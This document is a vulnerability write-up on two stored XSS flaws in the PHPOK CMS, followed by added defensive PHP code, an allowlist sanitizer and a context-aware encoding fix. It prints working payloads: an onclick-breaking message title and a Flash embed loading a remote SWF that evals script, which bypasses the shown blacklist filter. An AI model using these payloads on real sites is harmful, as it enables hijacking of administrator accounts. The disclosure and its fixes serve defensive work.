PHPOK stored XSS
A front-end function contains a stored XSS which can be used to attack the back-end admin panel and obtain administrator privileges.
The first XSS vulnerability:
The message function.
One output point in the back-end is as follows:
    <a class="icon delete end" onclick="content_del('201312', '[input]')" title="delete"></a>
We can see that the title of our message is output directly inside the onclick event handler. It is enough to submit a title such as '+alert(1)+', which is triggered when the administrator deletes the message:
Output:
    <a class="icon delete end" onclick="content_del('201312', 'test' + alert(1) + '')" title="delete"></a>
The second XSS vulnerability:
PHPOK's XSS filter function is as follows:
    function safe_html($info)
    {
        if (!$info) {
            return false;
        }
        $tmp = "/<([a-zA-Z0-9]+)(.*)(on[abort|beforeonload|blur|change|click|contextmenu|dblclick|drag|dragend|dragenter|dragleave|dragstart|drop|error|focus|keydown|keypress|keyup|load|message|mousedown|mousemove|mouseover|mouseout|mouseup|mousewheel|reset|resize|scroll|select|submit|unload]+)=(.+)>/isU";
        $info = preg_replace($tmp, "<\\1\\2\\4>", $info);
        //$info = preg_replace("/<([a-zA-Z0-9]+)(.*)([onabort|onbeforeonload|onblur|onchange|onclick|oncontextmenu|ondblclick|ondrag|ondragend|ondragenter|ondragleave|ondragover|ondragstart|ondrop|onerror|onfocus|onkeydown|onkeypress|onkeyup|onload|onmessage|onmousedown|onmousemove|onmouseover|onmouseout|onmouseup|onmousewheel|onreset|onresize|onscroll|onselect|onsubmit|onunload]+)\s*=\s*(.+)>/isU", "<\\1\\3>", $info);
        $tmp = array(
            "/<script(.*)<\/script>/isU",
            "/<frame(.*)>/isU",
            "/<\/fram(.*)>/isU",
            "/<iframe(.*)>/isU",
            "/<\/ifram(.*)>/isU",
            "/<style(.*)<\/style>/isU",
            "/<link(.*)>/isU",
            "/<\/link>/isU"
        );
        $info = preg_replace($tmp, '', $info);
        return $info;
    }
As can be seen, only a fixed list of tags and on* event attributes is filtered, so the filter is easily bypassed. For example, XSS can be achieved by embedding a Flash file:
    <embed src="http://chuhades.sinaapp.com/xss.swf" quality="high" bgcolor="#ffffff" width="500" height="500" name="FlashVars" align="middle" allowscriptaccess="always" flashvars="action=eval&codz=alert(document.domain)" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">
Front-end:
Back-end:
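A different way to handle the second vulnerability, shown here as an added example that is not PHPOK's own code: an allowlist sanitizer built on PHP's DOMDocument. Instead of deleting a blacklist of tags and on* attributes from the raw string, as safe_html does, it parses the message body and keeps only explicitly permitted elements and attributes, so an embed carrying allowscriptaccess and flashvars is removed together with any other unlisted tag, and an event handler on an allowed tag is stripped because no on* name is ever in the allowlist. The function names, the allowed-tag and attribute lists, and the sample message are constructed for this example.

```php
<?php
// Added example, not PHPOK's own code: allowlist sanitizer for message bodies.
// Everything not listed here is removed, the opposite of safe_html's blacklist.
// The lists, function names and the sample input are constructed for this example.

const ALLOWED_TAGS  = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a'];
const ALLOWED_ATTRS = ['a' => ['href', 'title']];

// Accept only http(s) URLs, same-site paths and fragments; any other scheme
// (javascript:, data:, vbscript:, ...) is rejected. Protocol-relative "//"
// is rejected too, so a link cannot be pointed off-site through this path.
function safe_url(string $url): bool
{
    return (bool) preg_match('#^(?:https?://|/(?!/)|\#)#i', trim($url));
}

function sanitize_html(string $html): string
{
    $dom  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // malformed input is expected here
    // The XML declaration makes libxml read the fragment as UTF-8; the wrapper
    // <div> gives the fragment one root without an implied <html><body>.
    $dom->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>',
                   LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $root = $dom->getElementsByTagName('div')->item(0);
    if ($root === null) {
        return '';                               // nothing parsed: fail closed
    }

    $walk = function (DOMNode $node) use (&$walk): void {
        // Snapshot the children first: removing nodes mutates the live list.
        foreach (iterator_to_array($node->childNodes, false) as $child) {
            if ($child instanceof DOMElement) {
                $tag = strtolower($child->tagName);
                if (!in_array($tag, ALLOWED_TAGS, true)) {
                    // Drops embed/object/iframe/script/style and their whole subtrees.
                    $node->removeChild($child);
                    continue;
                }
                foreach (iterator_to_array($child->attributes, false) as $attr) {
                    $name = strtolower($attr->name);
                    $keep = in_array($name, ALLOWED_ATTRS[$tag] ?? [], true)
                        && ($name !== 'href' || safe_url($attr->value));
                    if (!$keep) {
                        $child->removeAttribute($attr->name); // on* handlers are never allowlisted
                    }
                }
                $walk($child);
            } elseif (!($child instanceof DOMText)) {
                $node->removeChild($child);      // comments and PIs are not message content
            }
        }
    };
    $walk($root);

    // Serialise the children only, so the wrapper <div> does not leak into the output.
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $dom->saveHTML($child);
    }
    return $out;
}

// Constructed sample message: a Flash embed of the kind shown above, an inline
// event handler on an allowed tag, and a javascript: link.
$sample = '<p>Hello <embed src="http://example.invalid/xss.swf" allowscriptaccess="always" '
        . 'flashvars="action=eval&amp;codz=alert(1)" type="application/x-shockwave-flash">'
        . ' <b onmouseover="alert(1)">bold</b> <a href="javascript:alert(1)">link</a></p>';
echo sanitize_html($sample), "\n";
```

Running this drops the embed element entirely, removes onmouseover from the b element and removes the javascript: href from the link, while the surrounding paragraph text survives. The design choice worth noting is that an unlisted element is removed with its subtree rather than unwrapped; that is stricter than most users expect for plain formatting tags, but it means a new tag or attribute the filter author never thought of (the failure mode of safe_html) is rejected by default rather than passed through.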
Solution:
Apply JavaScript-string encoding to any value that is placed inside a JavaScript context or an HTML tag event attribute (such as onclick) before it is output.
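The fix above applied to the first vulnerability's output point, as an added example that is not PHPOK's own code. The vulnerable function reproduces the raw interpolation of the message title into the onclick handler; the fixed function encodes the title for the JavaScript string context and then for the HTML attribute context. The function names are constructed for this example; content_del, the '201312' month id and the test title come from the write-up.

```php
<?php
// Added example, not PHPOK's own code: the admin-side delete link rendered for
// a user-supplied message title. The function names are constructed here;
// content_del and the '201312' month id are taken from the write-up.

function render_delete_link_vulnerable(string $month, string $title): string
{
    // Raw interpolation into the onclick handler: a quote in $title ends the
    // JS string literal and whatever follows runs when the admin clicks.
    return '<a class="icon delete end" onclick="content_del(\'' . $month . '\', \'' . $title
         . '\')" title="delete"></a>';
}

// Encode a value as a JavaScript string literal. json_encode produces the
// quoted, backslash-escaped literal; the HEX flags additionally turn < > & ' "
// into \uXXXX escapes, so the literal can close neither a tag nor an attribute.
function js_string(string $value): string
{
    $literal = json_encode($value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
    return $literal === false ? '""' : $literal;   // invalid UTF-8: empty literal, fail closed
}

function render_delete_link_fixed(string $month, string $title): string
{
    // Inner context first (JavaScript string), outer context second (HTML
    // attribute): the browser undoes the attribute encoding before the JS
    // engine sees the handler, so this is the order that round-trips.
    $handler = 'content_del(' . js_string($month) . ', ' . js_string($title) . ')';
    return '<a class="icon delete end" onclick="'
         . htmlspecialchars($handler, ENT_QUOTES | ENT_HTML5, 'UTF-8')
         . '" title="delete"></a>';
}

$title = "test' + alert(1) + '";   // the message title from the write-up
echo render_delete_link_vulnerable('201312', $title), "\n";
echo render_delete_link_fixed('201312', $title), "\n";
```

In the vulnerable output the title's first quote closes the literal and alert(1) becomes part of the expression. In the fixed output the title's apostrophes are emitted as \u0027 inside a double-quoted literal and the literal's own double quotes are emitted as &quot; at the attribute level, so after the browser decodes the attribute the JS engine receives content_del("201312", "test\u0027 + alert(1) + \u0027") and the title reaches content_del as a single string whatever it contains. The same two-layer rule (encode for the innermost context first, then for each enclosing one) applies to any value placed inside an event attribute.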